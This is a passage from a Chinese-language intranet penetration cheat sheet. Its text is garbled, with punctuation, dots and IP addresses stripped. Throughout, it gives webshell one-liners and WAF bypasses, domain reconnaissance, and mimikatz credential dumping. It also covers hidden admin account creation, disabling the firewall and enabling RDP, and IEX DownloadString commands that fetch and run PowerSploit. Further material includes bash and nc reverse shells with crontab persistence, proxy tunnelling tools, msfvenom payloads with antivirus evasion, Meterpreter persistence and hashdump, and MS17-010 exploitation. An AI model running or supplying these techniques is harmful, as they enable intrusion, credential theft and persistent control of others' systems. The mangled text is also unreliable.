ēng)險(xiǎn)值（FinalScore）FinalScore=BaseScore×Compliance式中：BaseScore—漏洞基礎(chǔ)風(fēng)險(xiǎn)值。Compliance—遵從性。PAGEPAGE10/31內(nèi)網(wǎng)滲透知識(shí)點(diǎn)總結(jié)獲取webshell進(jìn)內(nèi)網(wǎng)測(cè)試主站，搜wooyun歷史洞未發(fā)現(xiàn)歷史洞，github,svn,目錄掃描未發(fā)現(xiàn)敏感信息,無域傳送，端口只開了80用ocr識(shí)別，找賬號(hào)，通過googlebaidubing等搜索，相關(guān)郵箱，域名等加常用找后臺(tái)，上傳有dog，用含有一句話的txt文件`phpeval$_POST[cmd']);`打包為zipphp文件`phpinclude'phar://1zip/1txt';`c刀被攔，修改configini文件`php_make@eval(call_user_func_array(base64_decode,array($_POST[action])));`用回調(diào)函數(shù)，第一個(gè)為函數(shù)名，二個(gè)為傳的參數(shù)前期信息收集queryuser||qwinsta查看當(dāng)前在線用戶netuser 查看本機(jī)用戶netuser/domain查看域用戶netview&netgroupdomaincomputers"/domain查看當(dāng)前域計(jì)算機(jī)列表第二個(gè)查的更多netview/domain查看有幾個(gè)域netview\\\\dc查看dc域內(nèi)共享文件netgroup/domain查看域里面的組netgroup"domainadmins"/domain查看域管netlocalgroupadministrators/domain /這個(gè)也是查域管，是升級(jí)為域控時(shí)，本地賬戶也成為域管netgroupdomaincontrollers"/domain域控nettime/domainnetconfigworkstation 當(dāng)前登錄域-計(jì)算機(jī)名-用戶名netuse\\\\pcxxcom)password/userxxxcom\username相當(dāng)于這個(gè)帳號(hào)登錄域內(nèi)主機(jī)，可訪問資源ipconfigsysteminfotasklist/svctasklist/Sip/Udomain\username/P/V查看遠(yuǎn)程計(jì)算機(jī)tasklistnetlocalgroupadministrators&&whoami查看當(dāng)前是不是屬于管理組netstatanonltest/dclistxx查看域控whoami/all查看MandatoryLabeluac級(jí)別和sid號(hào)netsessoin查看遠(yuǎn)程連接session(需要管理權(quán)限)netshare 共享目錄cmdkey/l 查看保存登陸憑echo%logonserver%查看登陸域spn–ladministratorspn記錄set環(huán)境變量dsqueryserver-查找目錄中的ADDC/LDS實(shí)例dsqueryuser-查找目錄中的用戶dsquerycomputer查詢所有計(jì)算機(jī)名稱windows2003dir/s*exe查找指定目錄下及子目錄下沒隱藏文件arpa發(fā)現(xiàn)遠(yuǎn)程登錄密碼等密碼netpass.exe 下載地址：https://wwwnirsoftnet/utils/network_password_recoveryhtml獲取windowvpn密碼：mimikatz.exe privilege::debug token::elevate lsadump::samlsadump::secretsexitwifi密碼：netshwlanshowprofile 查處wifinetshwlanshowprofileWiFinamekey=clear獲取對(duì)應(yīng)wifi的密碼ie代理reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettings"/vProxyServerreg query"HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettings"pac代理reg query "HKEY_USERSS-1-5-21-1563011143-1171140764-1273336227-500SoftwareMicrosoftWindowsCurrentVersionInternetSettings"/vAutoConfigURL //t0stmailpowershellnishang/samratashok/nishang其他常用命令ping icmp連通性nslookupwwwbaiducomvpsipdns連通性dig@vpsipwwwbaiducomcurlvps8080 http連通性tracertbitsadmin/transfernhttp://ip/xxexeC:\windows\temp\xexe一種上傳文件>=2008fuser-nvtcp80查看端口pidrdesktop-uusernameiplinux連接win遠(yuǎn)程桌面(有可能不成功)wherefilewin查找文件是否存在找路徑，Linux下使用命令findname*jsp來查找，Windows下，使用for/rc:\windows\temp\iinfilelsssdmp)do@echoinetstat-apn|grep8888 kill9PID 查看端口并kill遠(yuǎn)程登錄內(nèi)網(wǎng)主機(jī)判斷是內(nèi)網(wǎng)，還是外網(wǎng)，內(nèi)網(wǎng)轉(zhuǎn)發(fā)到vpsnetstatano 沒有開啟3389端口,復(fù)查下tasklist/svcsvchostexe對(duì)應(yīng)的TermService的pidnetstat相等的pid即3389端口.在主機(jī)上添加賬號(hào)netuseradmin1admin1/add&netlocalgroupadministratorsadmin1/add如不允許遠(yuǎn)程連接，修改注冊(cè)表REGADD"HKLM\SYSTEM\CurrentControlSet\Control\TerminalServer"/vfDenyTSConnections/tREG_DWORD/d00000000/fREG ADD"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /0x00000d3d/f如果系統(tǒng)未配置過遠(yuǎn)程桌面服務(wù)，第一次開啟時(shí)還需要添加防火墻規(guī)則，允許3389端口，命令如下:netsh advfirewall firewall add rule name="Remote Desktop"protocol=TCPdir=inlocalport=3389action=allow關(guān)閉防火墻netshfirewallsetopmodemode=disable3389user無法添加:/5866.html**隱藏win賬戶**syscmd:IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubuse/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-TokenManipulation.ps1');Invoke-TokenManipulation -CreateProcess'cmd.exe'-Username'ntauthority\system'adduser并隱藏:IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubuse/3gstudent/Windows-User-Clone/master/Windows-User-Clone.ps1')winserver有密碼強(qiáng)度要求，改為更復(fù)雜密碼即可:滲透技巧——Windows系統(tǒng)的帳戶隱藏https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E7%B3%BB%E7%BB%9F%E7%9A%84%E5%B8%90%E6%88%B7%E9%9A%90%E8%97%8F/windows的RDP連接記錄:http://rcoil.me/2018/05/%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/linuxbashbash-i>&/dev/tcp//80800>&1`bash-i`交互的shell`&`標(biāo)準(zhǔn)錯(cuò)誤輸出到標(biāo)準(zhǔn)輸出`/dev/tcp/10001/8080`建立socketipport`0&1`標(biāo)準(zhǔn)輸入到標(biāo)準(zhǔn)輸出(crontab-l;echo'*/60****exec9<>/dev/tcp/IP/port;exec0<&9;exec1>&92>&1;/bin/bash--noprofile-i')|crontab-猥瑣版(crontab-l;printf"*/60****exec9<>/dev/tcp/IP/PORT;exec0<&9;exec1>&92>&1;/bin/bash--noprofile-i;\rnocrontabforwhoami%100c\n")|crontab-詳細(xì)介紹/tom0li/security_circle/blob/master/15288418585142.mdngrok-backdoorGrokbackdoor是一個(gè)簡單的基于python的后門，它使用Ngrok隧道進(jìn)行通信。Ngrok后門可以使用Pyinstaller生成windowslinux和mac二進(jìn)制文件。雖然免殺，但如果開win防火墻會(huì)提示，生成后門時(shí)會(huì)詢問是否捆綁ngrok，選擇no時(shí)，在被攻擊機(jī)執(zhí)行時(shí)需聯(lián)網(wǎng)下載ngrok，運(yùn)行后，telnet連接即可./deepzec/Grok-backdoorveil這里，安裝問題有點(diǎn)多，我用kali201832安裝成功，先安裝下列依賴，后按照官方即可。apt-getinstalllibncurses5*apt-getinstalllibavutil55*apt-getinstallgcc-mingw-w64*apt-getinstallwine32生成shell./Veil.pyuse1usec/meterpreter/rev_tcp在win用mingw下gcc編譯bypass360gccovexevclws2_32使用之前生成的veilrcmsfconsolerveilrc一句話開啟http服務(wù)，虛擬機(jī)里開啟，在外訪問虛擬機(jī)ip即可下載虛擬機(jī)文件：`python-mSimpleHTTPServer80`ewtools:http://rootkitercom/EarthWorm新版tools：/Termite/**正向***被攻擊機(jī)(跳板)：temp目錄下:unzipew.zipfile/sbin/init(查看linux位數(shù))chmod755ew_for_Linux./ew_for_Linuxsssocksdl9999(偵聽00009999netstatpantu|grep9999(查看是否偵聽成功)*攻擊機(jī)*proxychain設(shè)置socks5為跳板ipportproxychainnmap即可以用跳板代理掃描其他主機(jī)**反向***攻擊機(jī)*chmod777./ew_for_linux64./ew_for_linuxsrcsocksl1080e2333即被攻擊機(jī)連接本機(jī)2333端口，轉(zhuǎn)發(fā)到本機(jī)的1080端口，訪問本機(jī)的1080端口，相當(dāng)訪問被攻擊機(jī)的2333設(shè)置proxychainsocks5本主機(jī)ipport1080proxychain代理即可*被攻擊機(jī)*chmod777ew_for_linux./ew_for_Linux32-srssocks-d00-e2333ncnc簡單使用https://tom0ligithubio/2017/05/06/nc/linuxroot權(quán)限mknod/tmp/backpipep/bin/sh0/tmp/backpipe|ncipport1/tmp/backpipe權(quán)限不夠用`mkfifo/tmp/backpipe`以上用nc監(jiān)聽即可lcx被攻擊機(jī)lcx.exe-slave888853389vpslcx.exe–listen88885555在本機(jī)mstsc登陸1391235555或在vps連接1270015555netshwin自帶(只支持tcp)360攔將本地8019216811018080netsh interface portproxy add v4tov4 listenport=80connectaddress=01connectport=8080通過連接1111018082端口，相當(dāng)連接111101可訪問的內(nèi)網(wǎng)19216821023389netsh interface portproxy add v4tov4 listenaddress=01listenport=8082connectaddress=02connectport=3389go+msf&py+msfbypass360msf編碼生成后，用:gobuildldflags="Hwindowsguisw"即可，詳細(xì)參考以下link/metasploit-payload-bypass-av-note//2017/04/20/msf-AntiVirus.html提權(quán)win提權(quán)輔助工具，原理主要通過systeminfo補(bǔ)丁信息比對(duì)漏洞庫,工具鏈接https://githubcom/GDSSecurity/WindowsExploitSuggester/linux提權(quán)輔助https://githubcom/jondonas/linuxexploitsuggester2感謝前輩收集的提權(quán)exp:windowskernelexploitsWindows平臺(tái)提權(quán)漏洞集合https://githubcom/SecWiki/windowskernelexploitslinuxkernelexploitsLinux平臺(tái)提權(quán)漏洞集合https://githubcom/SecWiki/linuxkernelexploitsmsflinux相關(guān)payload：linux/x86/meterpreter/reverse_tcplinux/x86/meterpreter/bind_tcplinux/x86/shell_bind_tcplinux/x86/shell_reverse_tcplinux/x64/shell/bind_tcplinux/x64/shell/reverse_tcplinux/x64/shell_bind_tcplinux/x64/shell_bind_tcp_random_portlinux/x64/shell_reverse_tcpwindows相關(guān)payload:windows/meterpreter/reverse_tcpwindows/meterpreter/bind_tcpwindows/meterpreter/reverse_hop_httpwindows/meterpreter/reverse_httpwindows/meterpreter/reverse_http_proxy_pstorewindows/meterpreter/reverse_httpswindows/meterpreter/reverse_https_proxywindows/shell_reverse_tcpwindows/shell_bind_tcpwindows/x64/meterpreter/reverse_tcpwindows/x64/meterpreter/bind_tcpwindows/x64/shell_reverse_tcpwindows/x64/shell_bind_tcp目標(biāo)服務(wù)器為64位用x64監(jiān)聽，反彈meterpreter用含有meterpreter的模塊，反彈普通的shell（nc）shell_reverse_tcp模塊監(jiān)聽,例如msf:反彈shellmsfvenom -a x86 --platform windows -windows/meterpreter/reverse_tcpLHOST=LPORT=-fexe>shell.exe監(jiān)聽:windows/meterpreter/reverse_tcp反彈shellnc-ecmd.exeipport監(jiān)聽windows/shell_reverse_tcpmeterpreter下上傳uploadfile下載downloadfileMsf進(jìn)程注入(測(cè)試win10沒成功,win2008可以，360會(huì)攔)meterpreter>getuidmeterpreter>getpidmeterpreter>psmeterpreter>migrate676Msfhashmeterpreter>runhashdump sysmeterpreter>runpost/windows/gather/smart_hashdump 需要sys限getsystem存在uac，用msfbypass，但特征明顯meterpreter>searchbypassuacmsfpowerdumploadmimikatz不太好用Msf的持續(xù)后門**Persistence:**`runpersistenceh`用于創(chuàng)建啟動(dòng)項(xiàng)啟動(dòng)，會(huì)創(chuàng)建注冊(cè)表，創(chuàng)建文件。（X86_Linux不支持此腳本）runpersistence-U-i10-p10390-rfree.ngrok.cc會(huì)被360攔，-i1010秒請(qǐng)求一次,使用powershell執(zhí)行也被監(jiān)控而被360攔截meterpreter的`rungetgui-e`命令可以開啟成功。360會(huì)提示阻止`Runmetsvc-h`：用于創(chuàng)建服務(wù)，會(huì)創(chuàng)建meterpreter服務(wù)，并上傳三個(gè)文件，使用-r參數(shù)可以卸載服務(wù)，被攔Msfpowershellmeterpreter>loadpowershellmeterpreter>powershell_shellPS>IEX(New-ObjectNet.WebClient).DownloadString('https://raw.git/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1');Ps>Invoke-Mimikatz-DumpCredsMsfRouter2個(gè)或多個(gè)路由之間，沒有配置相應(yīng)的路由表，不能訪問，獲得一臺(tái)機(jī)器shellsession添加路由，使msf可以在當(dāng)前shellsession下以被攻擊機(jī)訪問其他內(nèi)網(wǎng)主機(jī)，meterpreter>runget_local_subnetsmeterpreter>runautoroute-s/16添加路由meterpreter>runautoroute-p查看路由meterpreter>runautoroute-d-s/16刪除MS17-010meterpreter>backgroundmsfexploit(multi/handler)>useauxiliary/scanner/smb/smb_ms17_010msfauxiliary(scanner/smb/smb_ms17_010)>setrhosts/24msfauxiliary(scanner/smb/smb_ms17_010)>setthreads50msfauxiliary(scanner/smb/smb_ms17_010)>run先利用`exploit/windows/smb/ms17_010_psexec`win10舊版依舊可以，新版設(shè)置smbusersmbpass即可Msf掃描經(jīng)過上面設(shè)置路由即可使用以下scan：useauxiliary/scanner/por